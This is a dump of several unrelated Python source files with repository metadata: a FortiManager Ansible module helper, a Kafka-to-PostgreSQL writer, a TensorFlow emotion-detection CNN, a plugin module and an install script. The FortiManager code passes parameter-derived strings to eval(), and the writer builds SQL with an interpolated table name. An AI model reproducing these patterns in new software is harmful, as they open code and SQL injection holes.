if token.startswith('{') and token.endswith('}'):
unresolved_parameter = True
break
log.write('[%s]exporting: %s\n' % (process, selector))
log.write('\turl: %s\n' % (url))
if unresolved_parameter:
log.write('\t unknown parameter, skipped!\n')
return
response = self.conn.send_request('get', [{'url': url}])
self._process_export_response(selector, response, schema_invt, log, export_path, param, schema['params'])
def process_export(self, metadata):
from ansible_collections.fortinet.fortimanager.plugins.module_utils.exported_schema import schemas as exported_schema_inventory
export_selectors = self.module.params['export_playbooks']['selector']
export_path = './'
if 'path' in self.module.params['export_playbooks'] and self.module.params['export_playbooks']['path']:
export_path = self.module.params['export_playbooks']['path']
log = open('%s/export.log' % (export_path), 'w')
log.write('Export time: %s\n' % (str(datetime.datetime.now())))
# Check required parameter.
for selector in export_selectors:
if selector == 'all':
continue
export_meta = metadata[selector]
export_meta_param = export_meta['params']
export_meta_urls = export_meta['urls']
if not self.module.params['export_playbooks']['params'] or selector not in self.module.params['export_playbooks']['params']:
self.module.fail_json('parameter export_playbooks->params needs entry:%s' % (selector))
if not len(export_meta_urls):
raise AssertionError('Invalid schema.')
# extracted required parameter.
url_tokens = export_meta_urls[0].split('/')
required_params = list()
for _param in export_meta_param:
if '{%s}' % (_param) == url_tokens[-1]:
continue
required_params.append(_param)
for _param in required_params:
if _param not in self.module.params['export_playbooks']['params'][selector]:
self.module.fail_json('required parameters for selector %s: %s' % (selector, required_params))
# Check required parameter for selector: all
if 'all' in export_selectors:
if 'all' not in self.module.params['export_playbooks']['params'] or 'adom' not in self.module.params['export_playbooks']['params']['all']:
self.module.fail_json('required parameters for selector %s: %s' % ('all', ['adom']))
# process specific selector and 'all'
selectors_to_process = dict()
for selector in export_selectors:
if selector == 'all':
continue
selectors_to_process[selector] = (metadata[selector], self.module.params['export_playbooks']['params'][selector])
if 'all' in export_selectors:
for selector in metadata:
chosen = True
if not len(metadata[selector]['urls']):
raise AssertionError('Invalid Schema.')
url_tokens = metadata[selector]['urls'][0].split('/')
for _param in metadata[selector]['params']:
if _param == 'adom':
continue
elif '{%s}' % (_param) != url_tokens[-1]:
chosen =False
break
if not chosen or selector in selectors_to_process:
continue
selectors_to_process[selector] = (metadata[selector], self.module.params['export_playbooks']['params']['all'])
process_counter = 1
number_selectors = len(selectors_to_process)
for selector in selectors_to_process:
self._process_export_per_selector(selector,
selectors_to_process[selector][0],
selectors_to_process[selector][1],
log,
export_path,
'%s/%s' % (process_counter, number_selectors),
exported_schema_inventory)
process_counter += 1
self.module.exit_json(number_of_selectors=number_selectors,
number_of_valid_selectors=self._nr_valid_selectors,
number_of_exported_playbooks=self._nr_exported_playbooks,
system_infomation=self.system_status)
def process_fact(self, metadata):
if self.module.params['facts']['selector'] not in metadata:
raise AssertionError('selector is not expected in parameters')
selector = self.module.params['facts']['selector']
fact_params = metadata[selector]['params']
fact_urls = metadata[selector]['urls']
fact_revisions = metadata[selector]['revision']
matched, checking_message = self._version_matched(fact_revisions)
if not matched:
self.version_check_warnings.append('selector:%s %s' % (selector, checking_message))
if not len(fact_urls):
raise AssertionError('unexpected fact urls set')
real_params_keys = set()
if self.module.params['facts']['params']:
real_params_keys = set(self.module.params['facts']['params'].keys())
if real_params_keys != set(fact_params):
self.module.fail_json(msg='expect params:%s, given params:%s' % (list(fact_params), list(real_params_keys)))
url = None
if 'adom' in fact_params and not fact_urls[0].endswith('{adom}'):
if self.module.params['facts']['params']['adom'] == 'global':
for _url in fact_urls:
if '/global/' in _url:
url = _url
break
elif self.module.params['facts']['params']['adom'] != '' and self.module.params['facts']['params']['adom'] is not None:
for _url in fact_urls:
if '/adom/{adom}/' in _url:
url = _url
# url = _url.replace('/adom/{adom}/', '/adom/%s/' % (self.module.params['facts']['params']['adom']))
break
else:
# choose default URL which is for all domains
for _url in fact_urls:
if '/global/' not in _url and '/adom/{adom}/' not in _url:
url = _url
break
else:
url = fact_urls[0]
if not url:
self.module.fail_json(msg='can not find url in following sets:%s! please check params: adom' % (fact_urls))
_param_applied = list()
for _param in fact_params:
_the_param = self.module.params['facts']['params'][_param]
if self.module.params['facts']['params'][_param] is None:
_the_param = ''
token_hint = '/%s/{%s}' % (_param, _param)
token = '/%s/%s' % (_param, _the_param)
if token_hint in url:
_param_applied.append(_param)
url = url.replace(token_hint, token)
for _param in fact_params:
if _param in _param_applied:
continue
token_hint = '{%s}' % (_param)
token = self.module.params['facts']['params'][_param] if self.module.params['facts']['params'][_param] else ''
url = url.replace(token_hint, token)
# Other Filters and Sorters
filters = self.module.params['facts']['filter']
sortings = self.module.params['facts']['sortings']
fields = self.module.params['facts']['fields']
options = self.module.params['facts']['option']
api_params = [{'url': url}]
if filters:
api_params[0]['filter'] = filters
if sortings:
api_params[0]['sortings'] = sortings
if fields:
api_params[0]['fields'] = fields
if options:
api_params[0]['option'] = options
# Now issue the request.
response = self.conn.send_request('get', api_params)
self.do_exit(response)
def process_curd(self, argument_specs=None):
if 'state' not in self.module.params:
raise AssertionError('parameter state is expected')
track = [self.module_level2_name]
if 'bypass_validation' not in self.module.params or self.module.params['bypass_validation'] is False:
self.check_versioning_mismatch(track,
argument_specs[self.module_level2_name] if self.module_level2_name in argument_specs else None,
self.module.params[self.module_level2_name] if self.module_level2_name in self.module.params else None)
has_mkey = self.module_primary_key is not None and type(self.module.params[self.module_level2_name]) is dict
if has_mkey:
mvalue = ''
if self.module_primary_key.startswith('complex:'):
mvalue_exec_string = self.module_primary_key[len('complex:'):]
mvalue_exec_string = mvalue_exec_string.replace('{{module}}', 'self.module.params[self.module_level2_name]')
# mvalue_exec_string = 'mvalue = %s' % (mvalue_exec_string)
# exec(mvalue_exec_string)
# On Windows Platform, exec() call doesn't take effect.
mvalue = eval(mvalue_exec_string)
else:
mvalue = self.module.params[self.module_level2_name][self.module_primary_key]
self.do_exit(self._process_with_mkey(mvalue))
else:
self.do_exit(self._process_without_mkey())
def __tailor_attributes(self, data):
if type(data) == dict:
rdata = dict()
for key in data:
value = data[key]
if value is None:
continue
rdata[key] = self.__tailor_attributes(value)
return rdata
elif type(data) == list:
rdata = list()
for item in data:
if item is None:
continue
rdata.append(self.__tailor_attributes(item))
return rdata
else:
if data is None:
raise AssertionError('data is expected to be not none')
return data
def process_partial_curd(self, argument_specs=None):
track = [self.module_level2_name]
if 'bypass_validation' not in self.module.params or self.module.params['bypass_validation'] is False:
self.check_versioning_mismatch(track,
argument_specs[self.module_level2_name] if self.module_level2_name in argument_specs else None,
self.module.params[self.module_level2_name] if self.module_level2_name in self.module.params else None)
the_url = self.jrpc_urls[0]
if 'adom' in self.url_params and not self.jrpc_urls[0].endswith('{adom}'):
if self.module.params['adom'] == 'global':
for _url in self.jrpc_urls:
if '/global/' in _url:
the_url = _url
break
else:
for _url in self.jrpc_urls:
if '/adom/{adom}/' in _url:
the_url = _url
break
for _param in self.url_params:
token_hint = '{%s}' % (_param)
token = '%s' % (self.module.params[_param])
the_url = the_url.replace(token_hint, token)
the_url = the_url.rstrip('/')
api_params = [{'url': the_url}]
if self.module_level2_name in self.module.params:
if not self.top_level_schema_name:
raise AssertionError('top level schem name is not supposed to be empty')
api_params[0][self.top_level_schema_name] = self.__tailor_attributes(self.module.params[self.module_level2_name])
response = self.conn.send_request(self._propose_method('set'), api_params)
self.do_exit(response)
def check_versioning_mismatch(self, track, schema, params):
if not params or not schema:
return
param_type = schema['type'] if 'type' in schema else None
revisions = schema['revision'] if 'revision' in schema else None
matched, checking_message = self._version_matched(revisions)
if not matched:
param_path = track[0]
for _param in track[1:]:
param_path += '-->%s' % (_param)
self.version_check_warnings.append('param: %s %s' % (param_path, checking_message))
if param_type == 'dict' and 'options' in schema:
if type(params) is not dict:
raise AssertionError()
for sub_param_key in params:
sub_param = params[sub_param_key]
if sub_param_key in schema['options']:
sub_schema = schema['options'][sub_param_key]
track.append(sub_param_key)
self.check_versioning_mismatch(track, sub_schema, sub_param)
del track[-1]
elif param_type == 'list' and 'options' in schema:
if type(params) is not list:
raise AssertionError()
for grouped_param in params:
if type(grouped_param) is not dict:
raise AssertionError()
for sub_param_key in grouped_param:
sub_param = grouped_param[sub_param_key]
if sub_param_key in schema['options']:
sub_schema = schema['options'][sub_param_key]
track.append(sub_param_key)
self.check_versioning_mismatch(track, sub_schema, sub_param)
del track[-1]
def validate_parameters(self, pvb):
for blob in pvb:
attribute_path = blob['attribute_path']
pointer = self.module.params
ignored = False
for attr in attribute_path:
if attr not in pointer:
# If the parameter is not given, ignore that.
ignored = True
break
pointer = pointer[attr]
if ignored:
continue
lambda_expr = blob['lambda']
lambda_expr = lambda_expr.replace('$', str(pointer))
eval_result = eval(lambda_expr)
if not eval_result:
if 'fail_action' not in blob or blob['fail_action'] == 'warn':
self.module.warn(blob['hint_message'])
else:
# assert blob['fail_action'] == 'quit':
self.module.fail_json(msg=blob['hint_message'])
def _do_final_exit(self, rc, result):
# XXX: as with https://github.com/fortinet/ansible-fortimanager-generic.
# the failing conditions priority: failed_when > rc_failed > rc_succeeded.
failed = rc != 0
changed = rc == 0
if 'response_code' not in result:
raise AssertionError('response_code should be in result')
if self.module.params['rc_failed']:
for rc_code in self.module.params['rc_failed']:
if str(result['response_code']) == str(rc_code):
failed = True
result['result_code_overriding'] = 'rc code:%s is overridden to failure' % (rc_code)
elif self.module.params['rc_succeeded']:
for rc_code in self.module.params['rc_succeeded']:
if str(result['response_code']) == str(rc_code):
failed = False
result['result_code_overriding'] = 'rc code:%s is overridden to success' % (rc_code)
if self.system_status:
result['system_information'] = self.system_status
if len(self.version_check_warnings):
version_check_warning = dict()
version_check_warning['mismatches'] = self.version_check_warnings
if not self.system_status:
raise AssertionError()
version_check_warning['system_version'] = 'v%s.%s.%s' % (self.system_status['Major'],
self.system_status['Minor'],
self.system_status['Patch'])
self.module.warn('Ansible has detected version mismatch between FortiManager and your playbook, see more details by appending option -vvv')
self.module.exit_json(rc=rc, meta=result, version_check_warning=version_check_warning, failed=failed, changed=changed)
else:
self.module.exit_json(rc=rc, meta=result, failed=failed, changed=changed)
def do_nonexist_exit(self):
rc = 0
result = dict()
result['response_code'] = -3
result['response_message'] = 'object not exist'
self._do_final_exit(rc, result)
def do_exit(self, response):
rc = response[0]
result = dict()
result['response_data'] = list()
if 'data' in response[1]:
result['response_data'] = response[1]['data']
result['response_code'] = response[1]['status']['code']
result['response_message'] = response[1]['status']['message']
result['request_url'] = response[1]['url']
# XXX:Do further status mapping
self._do_final_exit(rc, result)
| 48.091266 | 151 | 0.58088 |
4a226bfd1bfe962ebbdf611286781edcfe44c34f | 305 | py | Python | 2016/10/asian-support-20161007/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | 14 | 2015-05-08T13:41:51.000Z | 2021-02-24T12:34:55.000Z | 2016/10/asian-support-20161007/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | null | null | null | 2016/10/asian-support-20161007/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | 7 | 2015-04-04T04:45:54.000Z | 2021-02-18T11:12:48.000Z | #!/usr/bin/env python
import base_filters
COPY_GOOGLE_DOC_KEY = '1wFUxIo3otpDWH1pMC1R8D_finHQDqHsDPueQ3QuGRbg'
USE_ASSETS = False
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS
| 21.785714 | 77 | 0.819672 |
4a226ca4af057fb89923ee9b7f5eae3b1731e11c | 2,076 | py | Python | module.py | carrier-io/security_scanner_w3af | f54ba99c46e00bfc861327b2e6c976c0e722f253 | [
"Apache-2.0"
] | null | null | null | module.py | carrier-io/security_scanner_w3af | f54ba99c46e00bfc861327b2e6c976c0e722f253 | [
"Apache-2.0"
] | null | null | null | module.py | carrier-io/security_scanner_w3af | f54ba99c46e00bfc861327b2e6c976c0e722f253 | [
"Apache-2.0"
] | 2 | 2021-07-13T10:14:05.000Z | 2021-07-21T09:08:11.000Z | #!/usr/bin/python3
# coding=utf-8
# Copyright 2021 getcarrier.io
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Module """
from pathlib import Path
import flask # pylint: disable=E0401
import jinja2 # pylint: disable=E0401
from pylon.core.tools import log # pylint: disable=E0611,E0401
from pylon.core.tools import module # pylint: disable=E0611,E0401
from .components.render_w3af import render_w3af_card
class Module(module.ModuleModel):
""" Galloper module """
def __init__(self, settings, root_path, context):
self.settings = settings
self.root_path = root_path
self.context = context
def init(self):
""" Init module """
log.info("Initializing module")
bp = flask.Blueprint(
"w3af", "plugins.security_scanner_w3af.plugin",
static_folder=str(Path(__file__).parents[0] / "static"),
static_url_path='/w3af/static/'
)
bp.jinja_loader = jinja2.ChoiceLoader([
jinja2.loaders.PackageLoader("plugins.security_scanner_w3af", "templates"),
])
# Register in app
self.context.app.register_blueprint(bp)
# Register template slot callback
self.context.slot_manager.register_callback("security_scanners", render_w3af_card)
from .rpc_worker import get_scanner_parameters
self.context.rpc_manager.register_function(get_scanner_parameters, name='w3af')
def deinit(self): # pylint: disable=R0201
""" De-init module """
log.info("De-initializing module")
| 35.186441 | 90 | 0.689788 |
4a226d5a5cac389aabfefe959ec12be35fc3e213 | 5,777 | py | Python | src/writer/worker.py | el-yurchito/home-assignment | 9995187aab3ceef0389c5635d13c6cc78560fd07 | [
"MIT"
] | null | null | null | src/writer/worker.py | el-yurchito/home-assignment | 9995187aab3ceef0389c5635d13c6cc78560fd07 | [
"MIT"
] | null | null | null | src/writer/worker.py | el-yurchito/home-assignment | 9995187aab3ceef0389c5635d13c6cc78560fd07 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import concurrent.futures
import json
import typing
import time
from kafka import KafkaConsumer
from psycopg2 import connect
from psycopg2.extras import execute_values
from shared.models import CheckResult
from writer.models import WriterSettings
class Worker(object):
""" Worker is checking result handling workflow. """
def __init__(self, config_file_path):
# type: (str) -> None
self.config = WriterSettings.import_from_file(config_file_path) # type: WriterSettings
# copied from `getting started with kafka`
# autocommit is disabled so that messages are not lost in case of polling/parsing error
self.consumer = KafkaConsumer(
self.config.kafka.topic,
auto_offset_reset="earliest",
bootstrap_servers=self.config.kafka.bootstrap_servers,
client_id=self.config.kafka.client,
group_id=self.config.kafka.group,
enable_auto_commit=False,
security_protocol="SSL",
ssl_cafile=self.config.kafka.ssl_ca_file,
ssl_certfile=self.config.kafka.ssl_cert_file,
ssl_keyfile=self.config.kafka.ssl_key_file,
)
def run(self):
if self.config.concurrency.checks == 1:
run_method = self._run_single_thread
else:
run_method = self._run_thread_pool
while True:
messages = self._get_messages() # requesting messages to process
try:
run_method(messages)
finally:
# acknowledge kafka that messages are processed
# some messages can be lost though, due to processing exceptions
self.consumer.commit()
if self.config.interval:
time.sleep(self.config.interval)
else:
# do exactly one check if no interval is specified
break
def _run_single_thread(self, messages):
# type: (typing.Mapping[str, typing.List[CheckResult]]) -> None
"""
Processes websites one by one.
Fails on the first unhandled exception.
"""
for website_url, check_results in messages.items():
exc = self._insert_row_batch(website_url, check_results)
if exc is not None:
raise exc
def _run_thread_pool(self, messages):
# type: (typing.Mapping[str, typing.List[CheckResult]]) -> None
"""
Processes websites using thread pool.
Unhandled exception in one thread doesn't affect other ones,
but "aggregated" exception containing all unhandled
exceptions will be raised in the end.
"""
errors = []
with concurrent.futures.ThreadPoolExecutor(max_workers=self.config.concurrency.checks) as executor:
future_tasks = [executor.submit(self._insert_row_batch, website, check_results)
for website, check_results in messages.items()]
for task in concurrent.futures.as_completed(future_tasks, timeout=self.config.concurrency.timeout):
task_result = task.result()
if task_result is not None:
errors.append(task_result)
if errors:
errors_str = "\n".join([str(exc) for exc in errors])
raise RuntimeError(f"{len(errors)} occurred during processing website check results:\n{errors_str}")
def _get_messages(self):
# type: () -> typing.Mapping[str, typing.List[CheckResult]]
""" Receives and decodes chunk of kafka messages. """
results = {} # website url to check results map
for _ in range(2):
poll_result = self.consumer.poll(
timeout_ms=self.config.kafka.timeout_poll * 1000,
max_records=self.config.kafka.poll_max_messages,
)
for raw_messages in poll_result.values():
for raw_message in raw_messages:
check_result = CheckResult.from_dict(json.loads(raw_message.value))
results.setdefault(check_result.url, []).append(check_result)
return results
def _insert_row_batch(self, website_url, check_results):
# type: (str, typing.List[CheckResult]) -> typing.Optional[Exception]
"""
Uses settings to find out DB table for given url.
Inserts check result into this table.
"""
if not check_results:
return # nothing to insert - nothing to do here
try:
table_name = self.config.websites_tables[website_url]
except KeyError as exc:
raise KeyError(f"DB table settings for url {str(exc)} are not specified")
try:
# assume configuration is trusted source
# otherwise using table_name in sql query like that
# can lead to SQL injection
insert_query = f"insert into {table_name} " \
f"(url, duration, started_at, error, pattern_found, status_code) " \
f"values %s"
# auto commit if there wasn't any exception
with connect(self.config.pg.connection_string) as conn:
with conn.cursor() as cursor:
# insert query params
values = []
for cr in check_results:
values.append((cr.url, cr.duration, cr.started_at, cr.error,
cr.pattern_found, cr.status_code))
execute_values(cursor, insert_query, values, page_size=self.config.pg.page_size)
except Exception as exc:
error = exc
else:
error = None
return error
| 38.771812 | 112 | 0.606543 |
4a226d8eb9dbce86aedcb71be5b943f9a4422a4f | 8,141 | py | Python | Chapter08/Emotion Prediction/CNN_for_Emotion_Detection.py | retwal/Predictive | 57c3cb64901b7a0629b70053ecf01dac5be66d6f | [
"MIT"
] | 73 | 2017-10-27T22:44:32.000Z | 2021-12-25T18:37:51.000Z | Chapter08/Emotion Prediction/CNN_for_Emotion_Detection.py | retwal/Predictive | 57c3cb64901b7a0629b70053ecf01dac5be66d6f | [
"MIT"
] | 3 | 2018-09-20T21:47:21.000Z | 2021-03-14T05:32:41.000Z | Chapter08/Emotion Prediction/CNN_for_Emotion_Detection.py | retwal/Predictive | 57c3cb64901b7a0629b70053ecf01dac5be66d6f | [
"MIT"
] | 72 | 2017-11-06T07:08:01.000Z | 2021-11-25T09:00:28.000Z | import tensorflow as tf
import numpy as np
import os, sys, inspect
from datetime import datetime
import Utility
import matplotlib.pyplot as plt
from tensorflow.python.framework import ops
from sklearn.metrics.classification import accuracy_score
from sklearn.metrics import precision_recall_fscore_support
import warnings
warnings.filterwarnings("ignore")
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
ops.reset_default_graph()
np.random.seed(123456789) # for reproducibility
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string("data_dir", "input/", "Path to data files (train and test)")
tf.flags.DEFINE_string("logs_dir", "Logs/CNN_logs/", "Logging path")
tf.flags.DEFINE_string("mode", "train", "mode: train (Default)/ test")
BATCH_SIZE = 128
LEARNING_RATE = 1e-3
MAX_ITERATIONS = 1000
REGULARIZATION = 1e-3
IMAGE_SIZE = 48
NUM_LABELS = 7
VALIDATION_PERCENT = 0.1
def add_to_regularization_loss(W, b):
tf.add_to_collection("losses", tf.nn.l2_loss(W))
tf.add_to_collection("losses", tf.nn.l2_loss(b))
def weight_variable(shape, stddev=0.02, name=None):
initial = tf.truncated_normal(shape, stddev=stddev)
if name is None:
return tf.Variable(initial)
else:
return tf.get_variable(name, initializer=initial)
def bias_variable(shape, name=None):
initial = tf.constant(0.0, shape=shape)
if name is None:
return tf.Variable(initial)
else:
return tf.get_variable(name, initializer=initial)
def conv2d_basic(x, W, bias):
conv = tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding="SAME")
return tf.nn.bias_add(conv, bias)
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME")
def emotionCNN(dataset):
with tf.name_scope("conv1") as scope:
tf.summary.histogram("W_conv1", weights['wc1'])
tf.summary.histogram("b_conv1", biases['bc1'])
conv_1 = tf.nn.conv2d(dataset, weights['wc1'], strides=[1, 1, 1, 1], padding="SAME")
h_conv1 = tf.nn.bias_add(conv_1, biases['bc1'])
h_1 = tf.nn.relu(h_conv1)
h_pool1 = max_pool_2x2(h_1)
add_to_regularization_loss(weights['wc1'], biases['bc1'])
with tf.name_scope("conv2") as scope:
tf.summary.histogram("W_conv2", weights['wc2'])
tf.summary.histogram("b_conv2", biases['bc2'])
conv_2 = tf.nn.conv2d(h_pool1, weights['wc2'], strides=[1, 1, 1, 1], padding="SAME")
h_conv2 = tf.nn.bias_add(conv_2, biases['bc2'])
h_2 = tf.nn.relu(h_conv2)
h_pool2 = max_pool_2x2(h_2)
add_to_regularization_loss(weights['wc2'], biases['bc2'])
with tf.name_scope("fc_1") as scope:
prob = 0.5
image_size = IMAGE_SIZE // 4
h_flat = tf.reshape(h_pool2, [-1, image_size * image_size * 64])
tf.summary.histogram("W_fc1", weights['wf1'])
tf.summary.histogram("b_fc1", biases['bf1'])
h_fc1 = tf.nn.relu(tf.matmul(h_flat, weights['wf1']) + biases['bf1'])
h_fc1_dropout = tf.nn.dropout(h_fc1, prob)
with tf.name_scope("fc_2") as scope:
tf.summary.histogram("W_fc2", weights['wf2'])
tf.summary.histogram("b_fc2", biases['bf2'])
pred = tf.matmul(h_fc1_dropout, weights['wf2']) + biases['bf2']
return pred
weights = {
'wc1': weight_variable([5, 5, 1, 32], name="W_conv1"),
'wc2': weight_variable([3, 3, 32, 64],name="W_conv2"),
'wf1': weight_variable([int((IMAGE_SIZE // 4) * (IMAGE_SIZE // 4)) * 64, 256],name="W_fc1"),
'wf2': weight_variable([256, NUM_LABELS], name="W_fc2")
}
biases = {
'bc1': bias_variable([32], name="b_conv1"),
'bc2': bias_variable([64], name="b_conv2"),
'bf1': bias_variable([256], name="b_fc1"),
'bf2': bias_variable([NUM_LABELS], name="b_fc2")
}
def loss(pred, label):
cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=label))
tf.summary.scalar('Entropy', cross_entropy_loss)
reg_losses = tf.add_n(tf.get_collection("losses"))
tf.summary.scalar('Reg_loss', reg_losses)
return cross_entropy_loss + REGULARIZATION * reg_losses
def train(loss, step):
return tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss, global_step=step)
def get_next_batch(images, labels, step):
offset = (step * BATCH_SIZE) % (images.shape[0] - BATCH_SIZE)
batch_images = images[offset: offset + BATCH_SIZE]
batch_labels = labels[offset:offset + BATCH_SIZE]
return batch_images, batch_labels
# For training
train_error_list = []
train_step_list = []
# For validation
valid_error_list = []
valid_step_list = []
def main(argv=None):
train_images, train_labels, valid_images, valid_labels, test_images = Utility.read_data(FLAGS.data_dir)
print("Training set size: %s" % train_images.shape[0])
print('Validation set size: %s' % valid_images.shape[0])
print("Test set size: %s" % test_images.shape[0])
global_step = tf.Variable(0, trainable=False)
dropout_prob = tf.placeholder(tf.float32)
input_dataset = tf.placeholder(tf.float32, [None, IMAGE_SIZE, IMAGE_SIZE, 1],name="input")
input_labels = tf.placeholder(tf.float32, [None, NUM_LABELS])
pred = emotionCNN(input_dataset)
output_pred = tf.nn.softmax(pred,name="output")
loss_val = loss(pred, input_labels)
train_op = train(loss_val, global_step)
summary_op = tf.summary.merge_all()
init_op = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init_op)
summary_writer = tf.summary.FileWriter(FLAGS.logs_dir, sess.graph)
saver = tf.train.Saver()
ckpt = tf.train.get_checkpoint_state(FLAGS.logs_dir)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
print("Model Restored!")
for step in range(MAX_ITERATIONS):
batch_image, batch_label = get_next_batch(train_images, train_labels, step)
feed_dict = {input_dataset: batch_image, input_labels: batch_label}
sess.run(train_op, feed_dict=feed_dict)
if step % 10 == 0:
train_loss, summary_str = sess.run([loss_val, summary_op], feed_dict=feed_dict)
summary_writer.add_summary(summary_str, global_step=step)
train_error_list.append(train_loss)
train_step_list.append(step)
print("Training Loss: %f" % train_loss)
if step % 100 == 0:
valid_loss = sess.run(loss_val, feed_dict={input_dataset: valid_images, input_labels: valid_labels})
valid_error_list.append(valid_loss)
valid_step_list.append(step)
print("%s Validation Loss: %f" % (datetime.now(), valid_loss))
saver.save(sess, FLAGS.logs_dir + 'model.ckpt', global_step=step)
# Plot loss over time
plt.plot(train_step_list, train_error_list, 'r--', label='CNN training loss', linewidth=4)
plt.title('CNN training loss per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN training loss')
plt.legend(loc='upper right')
plt.show()
# Plot loss over time
plt.plot(valid_step_list, valid_error_list, 'r--', label='CNN validation loss', linewidth=4)
plt.title('CNN validation loss per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN validation loss')
plt.legend(loc='upper right')
plt.show()
print(train_error_list)
print(valid_error_list)
'''
def plotLoss():
# Plot loss over time
plt.plot(train_step_list, train_error_list, 'r--', label='CNN training loss', linewidth=4)
plt.title('CNN training loss per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN training loss')
plt.legend(loc='upper right')
plt.show()
# Plot loss over time
plt.plot(valid_step_list, valid_error_list, 'r--', label='CNN validation loss', linewidth=4)
plt.title('CNN validation loss per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN validation loss')
plt.legend(loc='upper right')
plt.show()
'''
if __name__ == "__main__":
tf.app.run()
| 37.689815 | 116 | 0.666871 |
4a2272dcc0584b4c01ecc64f1c36237865f5d890 | 2,502 | py | Python | commands/helpp.py | Waves-rgb/promerator | 2206bec22ace93768eb766999f7542af606ba8c0 | [
"MIT"
] | null | null | null | commands/helpp.py | Waves-rgb/promerator | 2206bec22ace93768eb766999f7542af606ba8c0 | [
"MIT"
] | null | null | null | commands/helpp.py | Waves-rgb/promerator | 2206bec22ace93768eb766999f7542af606ba8c0 | [
"MIT"
] | null | null | null | import discord
import asyncio
import os
import json
import requests
from discord.ext import commands
from discord.ext.commands import has_permissions
import random
from keep_alive import keepAlive
green = discord.Color.green()
class helpp(commands.Cog):
def __init__(self,client):
self.client=client
@commands.command()
async def help(self,ctx):
embed = discord.Embed(title="Welcome to ZT's Music!", description="Here are the commands to use the bot. Make sure before each command to type ';;' Example: ;;help ", color=green)
embed.add_field(name="clear", value="Deletes the amount of messages you specify limit is 500 messages. To use this type: clear 20(You can replace 20 with whatver number less then 500.) (Only works if you have the Manage Messages role." , inline=False)
embed.add_field(name="Source", value="Source code for this bot is shown here." , inline=False)
embed.add_field(name="wiki_summary", value="Shows the first couple sentences of a Wikipedia article about your term, if nothing returns, it is likely that the term was not found as an article and try a similar word such as 'gaming' => 'video game'", inline=True)
embed.add_field(name="help_contact", value="How you can contact me for any support." , inline=True)
embed.add_field(name="search", value="Uses the WolframAplpha API to get the asnwer to your question that coem after. Example: ;;search popualation of Russia, or ;;search 5x+10=30" , inline=True)
embed.add_field(name="ping_check", value="Check latency of the bot" , inline=True)
embed.add_field(name="latency",value=f'{round(self.client.latency * 1000)}ms')
await ctx.send(embed=embed)
@commands.command()
async def ping_check(self,ctx):
embed=discord.Embed(title="My ping is ",description=f'{round(self.client.latency * 1000)}ms',color=green)
await ctx.send(embed=embed)
@commands.command()
async def source(self,ctx):
embed=discord.Embed(title="Source", url="https://github.com/zt07/ZT-s-Music", color=green)
await ctx.send(embed=embed)
@commands.command(breif="test command", description="test commanddesc")
async def test(self,ctx):
embed= discord.Embed(title=f"Check!", color = green)
await ctx.send(embed=embed)
@commands.command()
async def help_contact(self,ctx):
embed= discord.Embed(title=f"Help Contact:",descritpion="For any help you can dm me at zut0_7 on Instagram, or email me at [email protected]", color = green)
await ctx.send(embed=embed)
def setup(client):
client.add_cog(helpp(client)) | 50.04 | 264 | 0.751399 |
4a2272fe94d63227dfe0635d4dc7bb3b70dd533e | 1,338 | py | Python | install.py | emekoi/aria | 0c1dea022cf578a2175a2510cf160221b6dd6b0e | [
"MIT"
] | null | null | null | install.py | emekoi/aria | 0c1dea022cf578a2175a2510cf160221b6dd6b0e | [
"MIT"
] | null | null | null | install.py | emekoi/aria | 0c1dea022cf578a2175a2510cf160221b6dd6b0e | [
"MIT"
] | 1 | 2018-10-31T01:47:28.000Z | 2018-10-31T01:47:28.000Z | #!/usr/bin/python2.7
import os, sys, shutil, platform, time
OUTPUT = "bin/aria"
INSTALL = "install"
# EXECUTABLE 755
# REGULAR 644
INSTALLS = [
["bin/aria", 755, "/usr/local/bin"],
["src/aria.h", 644, "/usr/local/include/aria"],
# ["src/util.h", 644, "usr/local/include.aria"],
]
if platform.system() == "Windows":
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
OUTPUT += ".exe"
# INSTALL = "cp"
INSTALLS = [
["bin/aria", 755, "/c/MinGW/bin"],
["src/aria.h", 644, "/c/MinGW/include/aria"],
# ["src/util.h", 644, "/c/MinGW/include/aria"],
]
def fmt(fmt, dic):
for k in dic:
fmt = fmt.replace("{" + k + "}", str(dic[k]))
return fmt
def main():
global INSTALL, INSTALLS
print "initing..."
starttime = time.time()
verbose = "verbose" in sys.argv
res = 0
for FILE in INSTALLS:
print "installing " + FILE[0]
cmd = fmt(
"sh -c \"mkdir -p {dir}; {install} -m{mode} {file} {dir}\"",
{
"dir" : FILE[2],
"file" : FILE[0],
"mode" : FILE[1],
"install" : INSTALL,
"output" : OUTPUT,
})
if verbose:
print cmd
res = os.system(cmd)
if res == 0:
print "done (%.2fs)" % (time.time() - starttime)
else:
print "done with errors"
sys.exit(res)
if __name__ == "__main__":
main()
| 19.114286 | 66 | 0.539611 |
